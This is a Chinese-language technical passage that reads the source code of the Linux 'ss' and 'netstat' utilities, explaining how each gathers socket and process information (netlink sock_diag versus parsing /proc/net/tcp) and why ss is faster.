main函数就是用于对各种选项进行解析,并以此判断执行什么函数.

int main(int argc, char *argv[])
{
    int saw_states = 0;
    int saw_query = 0;
    int do_summary = 0;
    const char *dump_tcpdiag = NULL;
    FILE *filter_fp = NULL;
    int ch;
    int state_filter = 0;
    int addrp_width, screen_width = 80;
 
    while ((ch = getopt_long(argc, argv,
                 "dhaletuwxnro460spbEf:miA:D:F:vVzZN:KHS",
                 long_opts, NULL)) != EOF) {
        switch (ch) {
        case 'n':
            resolve_services = 0;
            break;
        ......
        }
        .....
    }

在默认情况下,会进入到如下代码中

if (do_default) {
    state_filter = state_filter ? state_filter : SS_CONN;
    filter_default_dbs(&current_filter);
}

程序会执行filter_default_dbs()函数,设置默认的过滤条件.

filter_default_dbs

static void filter_default_dbs(struct filter *f) {
    filter_db_set(f, UDP_DB);
    filter_db_set(f, DCCP_DB);
    filter_db_set(f, TCP_DB);
    filter_db_set(f, RAW_DB);
    filter_db_set(f, UNIX_ST_DB);
    filter_db_set(f, UNIX_DG_DB);
    filter_db_set(f, UNIX_SQ_DB);
    filter_db_set(f, PACKET_R_DB);
    filter_db_set(f, PACKET_DG_DB);
    filter_db_set(f, NETLINK_DB);
    filter_db_set(f, SCTP_DB);
}

ilter_default_dbs很简单就是在默认情况下设置的过滤条件.

之后程序会执行到unix_show(&current_filter);

unix_show

函数代码如下:

static void filter_default_dbs(struct filter *f) {
    filter_db_set(f, UDP_DB);
    filter_db_set(f, DCCP_DB);
    filter_db_set(f, TCP_DB);
    filter_db_set(f, RAW_DB);
    filter_db_set(f, UNIX_ST_DB);
    filter_db_set(f, UNIX_DG_DB);
    filter_db_set(f, UNIX_SQ_DB);
    filter_db_set(f, PACKET_R_DB);
    filter_db_set(f, PACKET_DG_DB);
    filter_db_set(f, NETLINK_DB);
    filter_db_set(f, SCTP_DB);
}
filter_default_dbs很简单就是在默认情况下设置的过滤条件.

之后程序会执行到unix_show(&current_filter);

unix_show
函数代码如下:

unix_show  Collapse source
static int unix_show(struct filter *f)
{
    FILE *fp;
    char buf[256];
    char name[128];
    int  newformat = 0;
    int  cnt;
    struct sockstat *list = NULL;
    const int unix_state_map[] = { SS_CLOSE, SS_SYN_SENT,
                       SS_ESTABLISHED, SS_CLOSING };
 
    if (!filter_af_get(f, AF_UNIX))
        return 0;
 
    if (!getenv("PROC_NET_UNIX") && !getenv("PROC_ROOT")
        && unix_show_netlink(f) == 0)
        return 0;
 
    if ((fp = net_unix_open()) == NULL)
        return -1;
    if (!fgets(buf, sizeof(buf), fp)) {
        fclose(fp);
        return -1;
    }
 
    if (memcmp(buf, "Peer", 4) == 0)
        newformat = 1;
    cnt = 0;
 
    while (fgets(buf, sizeof(buf), fp)) {
        struct sockstat *u, **insp;
        int flags;
 
        if (!(u = calloc(1, sizeof(*u))))
            break;
 
        if (sscanf(buf, "%x: %x %x %x %x %x %d %s",
               &u->rport, &u->rq, &u->wq, &flags, &u->type,
               &u->state, &u->ino, name) < 8)
            name[0] = 0;
 
        u->lport = u->ino;
        u->local.family = u->remote.family = AF_UNIX;
 
        if (flags & (1 << 16)) {
            u->state = SS_LISTEN;
        } else if (u->state > 0 &&
               u->state <= ARRAY_SIZE(unix_state_map)) {
            u->state = unix_state_map[u->state-1];
            if (u->type == SOCK_DGRAM && u->state == SS_CLOSE && u->rport)
                u->state = SS_ESTABLISHED;
        }
        if (unix_type_skip(u, f) ||
            !(f->states & (1 << u->state))) {
            free(u);
            continue;
        }
 
        if (!newformat) {
            u->rport = 0;
            u->rq = 0;
            u->wq = 0;
        }
 
        if (name[0]) {
            u->name = strdup(name);
            if (!u->name) {
                free(u);
                break;
            }
        }
 
        if (u->rport) {
            struct sockstat *p;
 
            for (p = list; p; p = p->next) {
                if (u->rport == p->lport)
                    break;
            }
            if (!p)
                u->peer_name = "?";
            else
                u->peer_name = p->name ? : "*";
        }
 
        if (f->f) {
            struct sockstat st = {
                .local.family = AF_UNIX,
                .remote.family = AF_UNIX,
            };
 
            memcpy(st.local.data, &u->name, sizeof(u->name));
            if (strcmp(u->peer_name, "*"))
                memcpy(st.remote.data, &u->peer_name,
                       sizeof(u->peer_name));
            if (run_ssfilter(f->f, &st) == 0) {
                free(u->name);
                free(u);
                continue;
            }
        }
 
        insp = &list;
        while (*insp) {
            if (u->type < (*insp)->type ||
                (u->type == (*insp)->type &&
                 u->ino < (*insp)->ino))
                break;
            insp = &(*insp)->next;
        }
        u->next = *insp;
        *insp = u;
 
        if (++cnt > MAX_UNIX_REMEMBER) {
            while (list) {
                unix_stats_print(list, f);
                printf("\n");
 
                unix_list_drop_first(&list);
            }
            cnt = 0;
        }
    }
    fclose(fp);
    while (list) {
        unix_stats_print(list, f);
        printf("\n");
 
        unix_list_drop_first(&list);
    }
 
    return 0;
}

这个函数就是解析网络数据的核心函数.代码较多,还是分布分析这些代码.

unix_show_netlink

if (!getenv("PROC_NET_UNIX") && !getenv("PROC_ROOT")
       && unix_show_netlink(f) == 0)
       return 0;
  • getenv判断PROC_NET_UNIXPROC_ROOT是否存在
  • unix_show_netlink(f)创建netlink

追踪进入到unix_show_netlink()

static int unix_show_netlink(struct filter *f)
{
    DIAG_REQUEST(req, struct unix_diag_req r);
 
    req.r.sdiag_family = AF_UNIX;
    req.r.udiag_states = f->states;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
    if (show_mem)
        req.r.udiag_show |= UDIAG_SHOW_MEMINFO;
 
    return handle_netlink_request(f, &req.nlh, sizeof(req), unix_show_sock);
}

f是一个filter,用于设置一些简单的过滤条件.

req.r.sdiag_family = AF_UNIX;
req.r.udiag_states = f->states;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

是用于设置diag_netnetlink的请求头,之后调用handle_netlink_request(f, &req.nlh, sizeof(req),unix_show_sock);

handle_netlink_request

跟踪进入到handle_netlink_request的实现

static int handle_netlink_request(struct filter *f, struct nlmsghdr *req,
        size_t size, rtnl_filter_t show_one_sock)
{
    int ret = -1;
    struct rtnl_handle rth;
 
    if (rtnl_open_byproto(&rth, 0, NETLINK_SOCK_DIAG))
        return -1;
 
    rth.dump = MAGIC_SEQ;
 
    if (rtnl_send(&rth, req, size) < 0)
        goto Exit;
 
    if (rtnl_dump_filter(&rth, show_one_sock, f))
        goto Exit;
 
    ret = 0;
Exit:
    rtnl_close(&rth);
    return ret;
}
  • 调用rtnl_send(&rth, req, size)用于发送diag_netnetlink的消息头.
  • rtnl_dump_filter(&rth, show_one_sock,f)获取netlink的返回消息,回调show_one_sock()函数.

rtnl_send

跟踪进入到lib/libnetlink.c

int rtnl_send(struct rtnl_handle *rth, const void *buf, int len)
{
    return send(rth->fd, buf, len, 0);
}

rtnl_send直接调用send()方法发送信息.

rtnl_dump_filter

跟踪进入到lib/libnetlink.c

int rtnl_dump_filter_nc(struct rtnl_handle *rth,
             rtnl_filter_t filter,
             void *arg1, __u16 nc_flags)
{
    const struct rtnl_dump_filter_arg a[2] = {
        { .filter = filter, .arg1 = arg1, .nc_flags = nc_flags, },
        { .filter = NULL,   .arg1 = NULL, .nc_flags = 0, },
    };
 
    return rtnl_dump_filter_l(rth, a);
}

rtnl_dump_filter_nc()中设置rtnl_dump_filter_arg过滤函数,之后调用rtnl_dump_filter_l()

int rtnl_dump_filter_l(struct rtnl_handle *rth,
               const struct rtnl_dump_filter_arg *arg)
{
    struct sockaddr_nl nladdr;
    struct iovec iov;
    struct msghdr msg = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
    char buf[32768];
    int dump_intr = 0;
 
    iov.iov_base = buf;
    while (1) {
        int status;
        const struct rtnl_dump_filter_arg *a;
        int found_done = 0;
        int msglen = 0;
 
        iov.iov_len = sizeof(buf);
        status = recvmsg(rth->fd, &msg, 0);
 
        if (status < 0) {
            if (errno == EINTR || errno == EAGAIN)
                continue;
            fprintf(stderr, "netlink receive error %s (%d)\n",
                strerror(errno), errno);
            return -1;
        }
 
        if (status == 0) {
            fprintf(stderr, "EOF on netlink\n");
            return -1;
        }
 
        if (rth->dump_fp)
            fwrite(buf, 1, NLMSG_ALIGN(status), rth->dump_fp);
 
        for (a = arg; a->filter; a++) {
            struct nlmsghdr *h = (struct nlmsghdr *)buf;
 
            msglen = status;
 
            while (NLMSG_OK(h, msglen)) {
                int err = 0;
 
                h->nlmsg_flags &= ~a->nc_flags;
 
                if (nladdr.nl_pid != 0 ||
                    h->nlmsg_pid != rth->local.nl_pid ||
                    h->nlmsg_seq != rth->dump)
                    goto skip_it;
 
                if (h->nlmsg_flags & NLM_F_DUMP_INTR)
                    dump_intr = 1;
 
                if (h->nlmsg_type == NLMSG_DONE) {
                    err = rtnl_dump_done(h);
                    if (err < 0)
                        return -1;
 
                    found_done = 1;
                    break; /* process next filter */
                }
 
                if (h->nlmsg_type == NLMSG_ERROR) {
                    rtnl_dump_error(rth, h);
                    return -1;
                }
 
                if (!rth->dump_fp) {
                    err = a->filter(&nladdr, h, a->arg1);
                    if (err < 0)
                        return err;
                }
 
skip_it:
                h = NLMSG_NEXT(h, msglen);
            }
        }
 
        if (found_done) {
            if (dump_intr)
                fprintf(stderr,
                    "Dump was interrupted and may be inconsistent.\n");
            return 0;
        }
 
        if (msg.msg_flags & MSG_TRUNC) {
            fprintf(stderr, "Message truncated\n");
            continue;
        }
        if (msglen) {
            fprintf(stderr, "!!!Remnant of size %d\n", msglen);
            exit(1);
        }
    }
}

rtnl_dump_filter_l()实现了通过netlink获取数据,然后根据rtnl_dump_filter_arg过滤数据.

获取数据:

struct sockaddr_nl nladdr;
struct iovec iov;
struct msghdr msg = {
    .msg_name = &nladdr,
    .msg_namelen = sizeof(nladdr),
    .msg_iov = &iov,
    .msg_iovlen = 1,
};
.....
status = recvmsg(rth->fd, &msg, 0);

过滤数据:

for (a = arg; a->filter; a++) {
    struct nlmsghdr *h = (struct nlmsghdr *)buf;
    .....
    h->nlmsg_flags &= ~a->nc_flags;
    if (nladdr.nl_pid != 0 ||
                h->nlmsg_pid != rth->local.nl_pid ||
                h->nlmsg_seq != rth->dump)
                goto skip_it;
 
            if (h->nlmsg_flags & NLM_F_DUMP_INTR)
                dump_intr = 1;
 
            if (h->nlmsg_type == NLMSG_DONE) {
                err = rtnl_dump_done(h);
                if (err < 0)
                    return -1;
 
                found_done = 1;
                break; /* process next filter */
            }
            .......

之前说过,handle_netlink_request(f, &req.nlh, sizeof(req), unix_show_sock);程序最终会回调unix_show_sock函数.

unix_show_sock

跟踪unix_show_sock的实现

static int unix_show_sock(const struct sockaddr_nl *addr, struct nlmsghdr *nlh,
        void *arg)
{
    struct filter *f = (struct filter *)arg;
    struct unix_diag_msg *r = NLMSG_DATA(nlh);
    struct rtattr *tb[UNIX_DIAG_MAX+1];
    char name[128];
    struct sockstat stat = { .name = "*", .peer_name = "*" };
 
    parse_rtattr(tb, UNIX_DIAG_MAX, (struct rtattr *)(r+1),
             nlh->nlmsg_len - NLMSG_LENGTH(sizeof(*r)));
 
    stat.type  = r->udiag_type;
    stat.state = r->udiag_state;
    stat.ino   = stat.lport = r->udiag_ino;
    stat.local.family = stat.remote.family = AF_UNIX;
 
    if (unix_type_skip(&stat, f))
        return 0;
 
    if (tb[UNIX_DIAG_RQLEN]) {
        struct unix_diag_rqlen *rql = RTA_DATA(tb[UNIX_DIAG_RQLEN]);
 
        stat.rq = rql->udiag_rqueue;
        stat.wq = rql->udiag_wqueue;
    }
    if (tb[UNIX_DIAG_NAME]) {
        int len = RTA_PAYLOAD(tb[UNIX_DIAG_NAME]);
 
        memcpy(name, RTA_DATA(tb[UNIX_DIAG_NAME]), len);
        name[len] = '\0';
        if (name[0] == '\0') {
            int i;
            for (i = 0; i < len; i++)
                if (name[i] == '\0')
                    name[i] = '@';
        }
        stat.name = &name[0];
        memcpy(stat.local.data, &stat.name, sizeof(stat.name));
    }
    if (tb[UNIX_DIAG_PEER])
        stat.rport = rta_getattr_u32(tb[UNIX_DIAG_PEER]);
 
    if (f->f && run_ssfilter(f->f, &stat) == 0)
        return 0;
 
    unix_stats_print(&stat, f);
 
    if (show_mem)
        print_skmeminfo(tb, UNIX_DIAG_MEMINFO);
    if (show_details) {
        if (tb[UNIX_DIAG_SHUTDOWN]) {
            unsigned char mask;
 
            mask = rta_getattr_u8(tb[UNIX_DIAG_SHUTDOWN]);
            printf(" %c-%c", mask & 1 ? '-' : '<', mask & 2 ? '-' : '>');
        }
    }
    printf("\n");
 
    return 0;
}

1.struct unix_diag_msg *r = NLMSG_DATA(nlh); parse_rtattr(tb, UNIX_DIAG_MAX, (struct rtattr *)(r+1),nlh->nlmsg_len - NLMSG_LENGTH(sizeof(*r)));获取netlink的数据

2.解析数据并赋值

stat.type  = r->udiag_type;
stat.state = r->udiag_state;
stat.ino   = stat.lport = r->udiag_ino;
stat.local.family = stat.remote.family = AF_UNIX;
-------------------------------------------------
stat.rq = rql->udiag_rqueue;
stat.wq = rql->udiag_wqueue;

unix_stats_print

unix_stats_print(&stat, f);获取网络的连接状态

static void unix_stats_print(struct sockstat *s, struct filter *f)
{
    char port_name[30] = {};
 
    sock_state_print(s);
 
    sock_addr_print(s->name ?: "*", " ",
            int_to_str(s->lport, port_name), NULL);
    sock_addr_print(s->peer_name ?: "*", " ",
            int_to_str(s->rport, port_name), NULL);
 
    proc_ctx_print(s);
}

sock_state_print

跟踪进入到sock_state_print()

static void sock_state_print(struct sockstat *s)
{
    const char *sock_name;
    static const char * const sstate_name[] = {
        "UNKNOWN",
        [SS_ESTABLISHED] = "ESTAB",
        [SS_SYN_SENT] = "SYN-SENT",
        [SS_SYN_RECV] = "SYN-RECV",
        [SS_FIN_WAIT1] = "FIN-WAIT-1",
        [SS_FIN_WAIT2] = "FIN-WAIT-2",
        [SS_TIME_WAIT] = "TIME-WAIT",
        [SS_CLOSE] = "UNCONN",
        [SS_CLOSE_WAIT] = "CLOSE-WAIT",
        [SS_LAST_ACK] = "LAST-ACK",
        [SS_LISTEN] =   "LISTEN",
        [SS_CLOSING] = "CLOSING",
    };
 
    switch (s->local.family) {
    case AF_UNIX:
        sock_name = unix_netid_name(s->type);
        break;
    case AF_INET:
    case AF_INET6:
        sock_name = proto_name(s->type);
        break;
    case AF_PACKET:
        sock_name = s->type == SOCK_RAW ? "p_raw" : "p_dgr";
        break;
    case AF_NETLINK:
        sock_name = "nl";
        break;
    default:
        sock_name = "unknown";
    }
 
    if (netid_width)
        printf("%-*s ", netid_width,
               is_sctp_assoc(s, sock_name) ? "" : sock_name);
    if (state_width) {
        if (is_sctp_assoc(s, sock_name))
            printf("`- %-*s ", state_width - 3,
                   sctp_sstate_name[s->state]);
        else
            printf("%-*s ", state_width, sstate_name[s->state]);
    }
 
    printf("%-6d %-6d ", s->rq, s->wq);
}

根据s→local.family分别输出对应的内容,代码就不做过多的解释了,就是简单的switch case的判断.全部执行完毕之后,输出的结果是:

Netid  State      Recv-Q Send-Q Local Address:Port                 Peer Address:Port               
u_seq  ESTAB      0      0      @00017 309855                * 309856

可以发现其实在ss的默认输出情况下也是没有pid信息.如果我们采用ss -p,结果是:

etid  State      Recv-Q Send-Q Local Address:Port                 Peer Address:Port               
u_seq  ESTAB      0      0      @00017 309855                * 309856                users:(("code",pid=17009,fd=17))
u_seq  ESTAB      0      0      @00012 157444                * 157445                users:(("chrome",pid=5834,fd=10))

user_ent_hash_build

当我们加了-p参数之后,程序运行的结果:

case 'p':
    show_users++;
    user_ent_hash_build();
    break;

show_users的值变为1,程序接着执行user_ent_hash_build()

static void user_ent_hash_build(void)
{
    const char *root = getenv("PROC_ROOT") ? : "/proc/";
    struct dirent *d;
    char name[1024];
    int nameoff;
    DIR *dir;
    char *pid_context;
    char *sock_context;
    const char *no_ctx = "unavailable";
    static int user_ent_hash_build_init;
 
    /* If show_users & show_proc_ctx set only do this once */
    if (user_ent_hash_build_init != 0)
        return;
 
    user_ent_hash_build_init = 1;
 
    strlcpy(name, root, sizeof(name));
 
    if (strlen(name) == 0 || name[strlen(name)-1] != '/')
        strcat(name, "/");
 
    nameoff = strlen(name);
 
    dir = opendir(name);
    if (!dir)
        return;
 
    while ((d = readdir(dir)) != NULL) {
        struct dirent *d1;
        char process[16];
        char *p;
        int pid, pos;
        DIR *dir1;
        char crap;
 
        if (sscanf(d->d_name, "%d%c", &pid, &crap) != 1)
            continue;
 
        if (getpidcon(pid, &pid_context) != 0)
            pid_context = strdup(no_ctx);
 
        snprintf(name + nameoff, sizeof(name) - nameoff, "%d/fd/", pid);
        pos = strlen(name);
        if ((dir1 = opendir(name)) == NULL) {
            free(pid_context);
            continue;
        }
 
        process[0] = '\0';
        p = process;
 
        while ((d1 = readdir(dir1)) != NULL) {
            const char *pattern = "socket:[";
            unsigned int ino;
            char lnk[64];
            int fd;
            ssize_t link_len;
            char tmp[1024];
 
            if (sscanf(d1->d_name, "%d%c", &fd, &crap) != 1)
                continue;
 
            snprintf(name+pos, sizeof(name) - pos, "%d", fd);
 
            link_len = readlink(name, lnk, sizeof(lnk)-1);
            if (link_len == -1)
                continue;
            lnk[link_len] = '\0';
 
            if (strncmp(lnk, pattern, strlen(pattern)))
                continue;
 
            sscanf(lnk, "socket:[%u]", &ino);
 
            snprintf(tmp, sizeof(tmp), "%s/%d/fd/%s",
                    root, pid, d1->d_name);
 
            if (getfilecon(tmp, &sock_context) <= 0)
                sock_context = strdup(no_ctx);
 
            if (*p == '\0') {
                FILE *fp;
 
                snprintf(tmp, sizeof(tmp), "%s/%d/stat",
                    root, pid);
                if ((fp = fopen(tmp, "r")) != NULL) {
                    if (fscanf(fp, "%*d (%[^)])", p) < 1)
                        ; /* ignore */
                    fclose(fp);
                }
            }
            user_ent_add(ino, p, pid, fd,
                    pid_context, sock_context);
            free(sock_context);
        }
        free(pid_context);
        closedir(dir1);
    }
    closedir(dir);
}

这个解析方法与netstat中的prg_cache_load的方式类似.都是解析/proc/pid/fd下面的内容获得socketinode编号.得到pid,inodefd之后,调用user_ent_add()方法.

user_ent_add

static void user_ent_add(unsigned int ino, char *process,
                    int pid, int fd,
                    char *proc_ctx,
                    char *sock_ctx)
{
    struct user_ent *p, **pp;
 
    p = malloc(sizeof(struct user_ent));
    if (!p) {
        fprintf(stderr, "ss: failed to malloc buffer\n");
        abort();
    }
    p->next = NULL;
    p->ino = ino;
    p->pid = pid;
    p->fd = fd;
    p->process = strdup(process);
    p->process_ctx = strdup(proc_ctx);
    p->socket_ctx = strdup(sock_ctx);
 
    pp = &user_ent_hash[user_ent_hashfn(ino)];
    p->next = *pp;
    *pp = p;
}

获取inode,pidfd信息,最终组成一个链表.

proc_ctx_print

程序在输出结果的时候,调用proc_ctx_print()

static void proc_ctx_print(struct sockstat *s)
{
    char *buf;
 
    if (show_proc_ctx || show_sock_ctx) {
        if (find_entry(s->ino, &buf,
                (show_proc_ctx & show_sock_ctx) ?
                PROC_SOCK_CTX : PROC_CTX) > 0) {
            printf(" users:(%s)", buf);
            free(buf);
        }
    } else if (show_users) {
        if (find_entry(s->ino, &buf, USERS) > 0) {
            printf(" users:(%s)", buf);
            free(buf);
        }
    }
}

如果show_users>0,执行find_entry(0,根据inode编号找到对应进程的信息:

find_entry

static int find_entry(unsigned int ino, char **buf, int type)
{
    struct user_ent *p;
    int cnt = 0;
    char *ptr;
    char *new_buf;
    int len, new_buf_len;
    int buf_used = 0;
    int buf_len = 0;
 
    if (!ino)
        return 0;
 
    p = user_ent_hash[user_ent_hashfn(ino)];
    ptr = *buf = NULL;
    while (p) {
        if (p->ino != ino)
            goto next;
 
        while (1) {
            ptr = *buf + buf_used;
            switch (type) {
            case USERS:
                len = snprintf(ptr, buf_len - buf_used,
                    "(\"%s\",pid=%d,fd=%d),",
                    p->process, p->pid, p->fd);
                break;
            case PROC_CTX:
                len = snprintf(ptr, buf_len - buf_used,
                    "(\"%s\",pid=%d,proc_ctx=%s,fd=%d),",
                    p->process, p->pid,
                    p->process_ctx, p->fd);
                break;
            case PROC_SOCK_CTX:
                len = snprintf(ptr, buf_len - buf_used,
                    "(\"%s\",pid=%d,proc_ctx=%s,fd=%d,sock_ctx=%s),",
                    p->process, p->pid,
                    p->process_ctx, p->fd,
                    p->socket_ctx);
                break;
            default:
                fprintf(stderr, "ss: invalid type: %d\n", type);
                abort();
            }
 
            if (len < 0 || len >= buf_len - buf_used) {
                new_buf_len = buf_len + ENTRY_BUF_SIZE;
                new_buf = realloc(*buf, new_buf_len);
                if (!new_buf) {
                    fprintf(stderr, "ss: failed to malloc buffer\n");
                    abort();
                }
                *buf = new_buf;
                buf_len = new_buf_len;
                continue;
            } else {
                buf_used += len;
                break;
            }
        }
        cnt++;
next:
        p = p->next;
    }
    if (buf_used) {
        ptr = *buf + buf_used;
        ptr[-1] = '\0';
    }
    return cnt;
}

通过遍历p = user_ent_hash[user_ent_hashfn(ino)];这个链表得到得到所有的节点.然后利用

p = user_ent_hash[user_ent_hashfn(ino)];
ptr = *buf = NULL;
while (p) {
    if (p->ino != ino)
        goto next;

如果遍历得到inode相等,那么就说明找到了pid,最终输出的结果如下:

switch (type) {
            case USERS:
                len = snprintf(ptr, buf_len - buf_used,
                    "(\"%s\",pid=%d,fd=%d),",
                    p->process, p->pid, p->fd);
                break;

最终输出的结果是:

Netid  State      Recv-Q Send-Q Local Address:Port                 Peer Address:Port               
u_seq  ESTAB      0      0      @00017 309855                * 309856                users:(("code",pid=17009,fd=17))

总结

由于ssnetstat数据获取的方式不同,导致在执行效率上面存在很大的差别.ssnetstat这两种方式也给我们需要获取主机上面的网络数据提供了一个很好的思路.

netstat源代码调试&原理分析

说明

估计平时大部分人都是通过netstat来查看网络状态,但是事实是netstat已经逐渐被其他的命令替代,很多新的Linux发行版本中很多都不支持了netstat。以ubuntu 18.04为例来进行说明:

~ netstat 
zsh: command not found: netstat

按照difference between netstat and ss in linux?这篇文章的说法:

NOTE This program is obsolete. Replacement for netstat is ss.
Replacement for netstat -r is ip route. Replacement for netstat -i is
ip -s link. Replacement for netstat -g is ip maddr.

中文含义就是:netstat已经过时了,netstat的部分命令已经被ip这个命令取代了,当然还有更为强大的ssss命令用来显示处于活动状态的套接字信息。ss命令可以用来获取socket统计信息,它可以显示和netstat类似的内容。但ss的优势在于它能够显示更多更详细的有关TCP和连接状态的信息,而且比netstat更快速更高效。netstat的原理显示网络的原理仅仅只是解析/proc/net/tcp,所以如果服务器的socket连接数量变得非常大,那么通过netstat执行速度是非常慢。而ss采用的是通过tcp_diag的方式来获取网络信息,tcp_diag通过netlink的方式从内核拿到网络信息,这也是ss更高效更全面的原因。

下图就展示了ssnetstat在监控上面的区别。

ss.png

ss是获取的socket的信息,而netstat是通过解析/proc/net/下面的文件来获取信息包括Sockets,TCP/UDPIPEthernet信息。

netstatss的效率的对比,找同一台机器执行:

time ss
........
real    0m0.016s
user    0m0.001s
sys        0m0.001s
--------------------------------
time netstat
real    0m0.198s
user    0m0.009s
sys        0m0.011s

ss明显比netstat更加高效.

netstat简介

netstat是在net-tools工具包下面的一个工具集,net-tools提供了一份net-tools的源码,我们通过net-tools来看看netstat的实现原理。

netstat源代码调试

下载net-tools之后,导入到Clion中,创建CMakeLists.txt文件,内容如下:

cmake_minimum_required(VERSION 3.13)
project(test C)

set(BUILD_DIR .)

#add_executable()
add_custom_target(netstat command -c ${BUILD_DIR})

修改根目录下的Makefile中的59行的编译配置为:

CFLAGS ?= -O0 -g3

netstat.png

按照如上图设置自己的编译选项

以上就是搭建netstat的源代码调试过程。

tcp show

在netstat不需要任何参数的情况,程序首先会运行到2317行的tcp_info()

#if HAVE_AFINET
    if (!flag_arg || flag_tcp) {
        i = tcp_info();
        if (i)
        return (i);
    }

    if (!flag_arg || flag_sctp) {
        i = sctp_info();
        if (i)
        return (i);
    }
.........

跟踪进入到tcp_info():

static int tcp_info(void)
{
    INFO_GUTS6(_PATH_PROCNET_TCP, _PATH_PROCNET_TCP6, "AF INET (tcp)",
           tcp_do_one, "tcp", "tcp6");
}

参数的情况如下:

_PATH_PROCNET_TCP,在lib/pathnames.h中定义,是#define _PATH_PROCNET_TCP "/proc/net/tcp"

_PATH_PROCNET_TCP6, 在lib/pathnames.h中定义, 是#define _PATH_PROCNET_TCP6 "/proc/net/tcp6"

tcp_do_one,函数指针,位于1100行,部分代码如下:

static void tcp_do_one(int lnr, const char *line, const char *prot)
{
unsigned long rxq, txq, time_len, retr, inode;
int num, local_port, rem_port, d, state, uid, timer_run, timeout;
char rem_addr[128], local_addr[128], timers[64];
const struct aftype *ap;
struct sockaddr_storage localsas, remsas;
struct sockaddr_in *localaddr = (struct sockaddr_in *)&localsas;
struct sockaddr_in *remaddr = (struct sockaddr_in *)&remsas;
......

tcp_do_one()就是用来解析/proc/net/tcp/proc/net/tcp6每一行的含义的,关于/proc/net/tcp的每一行的含义可以参考之前写过的osquery源码解读之分析process_open_socket中的扩展章节。

INFO_GUTS6

#define INFO_GUTS6(file,file6,name,proc,prot4,prot6)    \
 char buffer[8192];                    \
 int rc = 0;                        \
 int lnr = 0;                        \
 if (!flag_arg || flag_inet) {                \
    INFO_GUTS1(file,name,proc,prot4)            \
 }                            \
 if (!flag_arg || flag_inet6) {                \
    INFO_GUTS2(file6,proc,prot6)            \
 }                            \
 INFO_GUTS3

INFO_GUTS6采用了#define的方式进行定义,最终根据是flag_inet(IPv4)或者flag_inet6(IPv6)的选项分别调用不同的函数,我们以INFO_GUTS1(file,name,proc,prot4)进一步分析。

INFO_GUTS1

#define INFO_GUTS1(file,name,proc,prot)            \
  procinfo = proc_fopen((file));            \
  if (procinfo == NULL) {                \
    if (errno != ENOENT && errno != EACCES) {        \
      perror((file));                    \
      return -1;                    \
    }                            \
    if (!flag_noprot && (flag_arg || flag_ver))        \
      ESYSNOT("netstat", (name));            \
    if (!flag_noprot && flag_arg)            \
      rc = 1;                        \
  } else {                        \
    do {                        \
      if (fgets(buffer, sizeof(buffer), procinfo))    \
        (proc)(lnr++, buffer,prot);            \
    } while (!feof(procinfo));                \
    fclose(procinfo);                    \
  }

rocinfo = proc_fopen((file)) 获取/proc/net/tcp的文件句柄

fgets(buffer, sizeof(buffer), procinfo) 解析文件内容并将每一行的内容存储在buffer

(proc)(lnr++, buffer,prot),利用(proc)函数解析buffer(proc)就是前面说明的tcp_do_one()函数

tcp_do_one

" 14: 020110AC:B498 CF0DE1B9:4362 06 00000000:00000000 03:000001B2 00000000 0 0 0 3 0000000000000000这一行为例来说明tcp_do_one()函数的执行过程。

tcp_do_one_1.png

由于分析是Ipv4,所以会跳过#if HAVE_AFINET6这段代码。之后执行:

num = sscanf(line,
    "%d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %lX:%lX %X:%lX %lX %d %d %lu %*s\n",
         &d, local_addr, &local_port, rem_addr, &rem_port, &state,
         &txq, &rxq, &timer_run, &time_len, &retr, &uid, &timeout, &inode);
if (num < 11) {
    fprintf(stderr, _("warning, got bogus tcp line.\n"));
    return;
}

解析数据,并将每一列的数据分别填充到对应的字段上面。分析一下其中的每个字段的定义:

char rem_addr[128], local_addr[128], timers[64];
struct sockaddr_storage localsas, remsas;
struct sockaddr_in *localaddr = (struct sockaddr_in *)&localsas;
struct sockaddr_in *remaddr = (struct sockaddr_in *)&remsas;

在Linux中sockaddr_insockaddr_storage的定义如下:

struct sockaddr {
   unsigned short    sa_family;    // address family, AF_xxx
   char              sa_data[14];  // 14 bytes of protocol address
};


struct  sockaddr_in {
    short  int  sin_family;                      /* Address family */
    unsigned  short  int  sin_port;       /* Port number */
    struct  in_addr  sin_addr;              /* Internet address */
    unsigned  char  sin_zero[8];         /* Same size as struct sockaddr */
};
/* Internet address. */
struct in_addr {
  uint32_t       s_addr;     /* address in network byte order */
};

struct sockaddr_storage {
    sa_family_t  ss_family;     // address family

    // all this is padding, implementation specific, ignore it:
    char      __ss_pad1[_SS_PAD1SIZE];
    int64_t   __ss_align;
    char      __ss_pad2[_SS_PAD2SIZE];
};

之后代码继续执行:

sscanf(local_addr, "%X", &localaddr->sin_addr.s_addr);
sscanf(rem_addr, "%X", &remaddr->sin_addr.s_addr);
localsas.ss_family = AF_INET;
remsas.ss_family = AF_INET;

local_addr使用sscanf(,"%X")得到对应的十六进制,保存到&localaddr->sin_addr.s_addr(即in_addr结构体中的s_addr)中,同理&remaddr->sin_addr.s_addr。运行结果如下所示:

saddr.png

addr_do_one

addr_do_one(local_addr, sizeof(local_addr), 22, ap, &localsas, local_port, "tcp");
addr_do_one(rem_addr, sizeof(rem_addr), 22, ap, &remsas, rem_port, "tcp");

程序继续执行,最终会执行到addr_do_one()函数,用于解析本地IP地址和端口,以及远程IP地址和端口。

static void addr_do_one(char *buf, size_t buf_len, size_t short_len, const struct aftype *ap,
            const struct sockaddr_storage *addr,
            int port, const char *proto
)
{
    const char *sport, *saddr;
    size_t port_len, addr_len;

    saddr = ap->sprint(addr, flag_not & FLAG_NUM_HOST);
    sport = get_sname(htons(port), proto, flag_not & FLAG_NUM_PORT);
    addr_len = strlen(saddr);
    port_len = strlen(sport);
    if (!flag_wide && (addr_len + port_len > short_len)) {
        /* Assume port name is short */
        port_len = netmin(port_len, short_len - 4);
        addr_len = short_len - port_len;
        strncpy(buf, saddr, addr_len);
        buf[addr_len] = '\0';
        strcat(buf, ":");
        strncat(buf, sport, port_len);
    } else
          snprintf(buf, buf_len, "%s:%s", saddr, sport);
}

1.saddr = ap->sprint(addr, flag_not & FLAG_NUM_HOST); 这个表示是否需要将addr转换为域名的形式。由于addr值是127.0.0.1,转换之后得到的就是localhost,其中FLAG_NUM_HOST的就等价于--numeric-hosts的选项。

